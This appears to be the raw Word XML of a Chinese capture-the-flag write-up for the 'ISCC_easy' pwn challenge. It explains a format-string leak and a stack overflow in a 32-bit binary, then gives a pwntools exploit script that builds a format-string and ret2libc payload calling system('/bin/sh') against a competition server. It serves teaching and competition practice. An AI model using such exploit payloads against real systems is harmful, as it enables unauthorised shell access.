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D9312" w14:textId="51B0F07A" w:rsidR="00437A38" w:rsidRDefault="00FC4FC2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Nebu1ea </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">韩磊 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00E50D1C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>1504895347@qq.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="040B2DBD" w14:textId="77777777" w:rsidR="00FC4FC2" w:rsidRDefault="00FC4FC2"/>
    <w:p w14:paraId="6993602D" w14:textId="1E6B4865" w:rsidR="00FC4FC2" w:rsidRDefault="00FC4FC2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pwn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ISCC_easy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65040188" w14:textId="77777777" w:rsidR="00FC4FC2" w:rsidRDefault="00FC4FC2"/>
    <w:p w14:paraId="6BEB969B" w14:textId="30A966BB" w:rsidR="00FC4FC2" w:rsidRDefault="00FC4FC2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692799B4" w14:textId="083CC015" w:rsidR="00FC4FC2" w:rsidRDefault="00FC4FC2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>32位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打开附件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596D6A25" w14:textId="0450B466" w:rsidR="00FC4FC2" w:rsidRDefault="00FC4FC2">
      <w:r w:rsidRPr="00FC4FC2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27256BC6" wp14:editId="16ED073B">
            <wp:extent cx="5274310" cy="2618105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16239316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316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607A" w14:textId="0E731351" w:rsidR="00FC4FC2" w:rsidRDefault="00FC4FC2">
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ain函数里就有一个格式字符串漏洞，我们可以利用它泄露地址以及修改x的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B131570" w14:textId="26EFC240" w:rsidR="00D20E59" w:rsidRDefault="00D20E59">
      <w:r w:rsidRPr="00D20E59">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56FBCC38" wp14:editId="6B1AE172">
            <wp:extent cx="5274310" cy="1936115"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1706269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69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6E01" w14:textId="36FAE032" w:rsidR="00D20E59" w:rsidRDefault="00D20E59">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很明显的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溢出漏洞，直接</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就行了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7614CFFA" w14:textId="77777777" w:rsidR="00D20E59" w:rsidRDefault="00D20E59"/>
    <w:p w14:paraId="7B7639AF" w14:textId="0A31181D" w:rsidR="00D20E59" w:rsidRDefault="00D20E59">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF66E5C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0E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0E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pwn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*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF49271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0E59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D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Crypto.Util.number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0E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>long_to_bytes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0E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bytes_to_long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</w:p>
    <w:p w14:paraId="30A2DCC8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0E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>context.log_level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'debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FCB56D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gramStart"/>
      <w:r w:rsidRPr="00D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>context(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>arch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'i386'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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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63C90F75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D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>context.terminal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20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tmux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>splitw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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'-h'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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3362D4E5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0E5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D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>remote(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'182.92.237.102'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, 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10013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8E236A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0E59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%5c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%9$n%15$p%12$paaa'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p32(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804C030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'/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:p>
    <w:p w14:paraId="74F18B9F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D20E5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0E59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186452D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D20E5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'0x'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4718B746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0E59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20E5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.recv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f20ceed5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f20b4000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1A3BCFE0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D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>a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.recvuntil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'0x'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3A276E1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0E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>stack_addr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D20E5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.recv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), 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0AB7598D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D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>buffer_addr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0E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>stack_addr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ffc685b0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ffc68588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36F33876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D20E59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D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D20E5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94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p32(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>libc_base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41360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p32(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>08049399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D20E59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 xml:space="preserve"> p32(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>buffer_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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2BC9D039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D20E5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.sendline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>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>payload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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7845EDE0" w14:textId="77777777" w:rsidR="00D20E59" w:rsidRPr="00D20E59" w:rsidRDefault="00D20E59" w:rsidP="00D20E5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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D20E5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D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D20E59">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213322C7" w14:textId="77777777" w:rsidR="00D20E59" w:rsidRPr="00D20E59" w:rsidRDefault="00D20E59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D20E59" w:rsidRPr="00D20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09"/>
    <w:rsid w:val="000F1909"/>
    <w:rsid w:val="00371D5C"/>
    <w:rsid w:val="00437A38"/>
    <w:rsid w:val="00464929"/>
    <w:rsid w:val="00D20E59"/>
    <w:rsid w:val="00FC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2E3AC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{33907A05-2B64-446E-99EC-F14B736A0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9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9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9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9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F19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F19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F19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F19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19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19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F19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F19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9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F19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F19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F19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F19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F19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F19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F19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F19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F19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F19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F19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F19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F19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F19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F19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F1909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C4FC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C4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1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150489534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韩</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>磊 韩</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-13T02:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-13T02:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>